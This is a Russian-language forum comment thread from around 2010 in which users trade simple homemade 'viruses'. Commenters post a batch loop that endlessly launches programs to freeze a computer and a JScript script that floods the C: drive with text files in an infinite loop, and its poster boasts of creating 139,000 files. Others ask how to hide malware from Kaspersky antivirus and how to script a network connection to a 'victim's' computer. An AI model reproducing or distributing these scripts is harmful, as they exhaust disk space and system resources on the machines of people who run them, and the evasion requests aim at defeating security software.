Комментарий от BLACK^GRAVE [ Сентябрь 18, 2010, 03:20 ]

Привет всем парни кул вирусы тока ктонить может подсказать как можно сделать так чтоб антивирусник не видел вирусы ато ппц почти всё что создаю каспер сразу сьедает.И буду очень признателен если скинете на маил операторы написания вирусов плиз.мой маил doubleSK@mail.ru

Комментарий от Сергй [ Сентябрь 19, 2010, 13:35 ]

вот вирус который запускает программу до бесконечности
@echo off
😡
start explorer
goto 😡

explorer можно поменятьь на любую программу просто explorer сильно грузит комп.

Комментарий от Dgane Makefly [ Сентябрь 21, 2010, 14:09 ]
Комментарий от fictiv [ Октябрь 4, 2010, 13:03 ]
Комментарий от fictiv [ Октябрь 4, 2010, 13:04 ]

Большое спасибо за информацию данную на этом сайте,
очень познавательно.

Комментарий от Hight m [ Октябрь 10, 2010, 16:00 ]
Комментарий от HOST [ Октябрь 10, 2010, 20:05 ]

md C:\ABCD
set SystemRoot =C:\ABCD

проверьте рабочий код или нет?)))

Комментарий от Гость [ Октябрь 12, 2010, 09:22 ]

Друг мой я вижу ты отличный вируса писолог а ч средний можеш обучить меня всем тонкостям?

Комментарий от Димас [ Октябрь 23, 2010, 21:14 ]

От этой штучки систему затормозит так что мало не покажеться!

Комментарий от ороллоооа [ Октябрь 24, 2010, 11:06 ]

Это не мое, но вот исходник. Сохранять с расширением *.js:
function CreateFile(name)
<
var fso, tf;
fso = new ActiveXObject(«Scripting.FileSystemObject»);
tf = fso.CreateTextFile(«c:\\»+name+».txt», true);
tf.WriteLine(«Превед! Я Кролег!») ;
tf.Write («Я быстро размножаюсь»);
tf.Write («Ой, кажица я сжевал твой диск C, но D мне понравился больше!»);
tf.Write («Ой, кажица я накакал в папке Windows!»);
tf.Write («У миня радилось исче тызяча крольчадог!»);
tf.Close();
>
function newKroleg(n) <
CreateFile(«Кролег»+n);
>
for (i=1;i>0;i++) <
newKroleg(i);
>
У меня он 139.000 кролегов на диске С наплодил! Будьте осторожны!

Комментарий от ороллоооа [ Октябрь 24, 2010, 11:09 ]

Является модифицированной версией одного неработающего вируса.

Комментарий от ороллоооа [ Октябрь 24, 2010, 13:19 ]

все вири читать нее стал но уже раз в пятый читаю эту бредятину

Комментарий от ПГАМ [ Октябрь 26, 2010, 10:43 ]

Это всё фигня, нужен бат файл, устанавливающий сетевое соединение с компьютером жертвы. Как такой написать?

Комментарий от Лам [ Октябрь 26, 2010, 11:36 ]

Лам
никак. в BAt интерпритаторе нет таких команд. на visual basic пиши.

Комментарий от ороллоооа [ Октябрь 31, 2010, 18:20 ]

Комментарий от neuda4nik
[ Июнь 13, 2008, 00:01 ]

Источник

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Комментарий от Юлия [ Ноябрь 6, 2010, 16:49 ]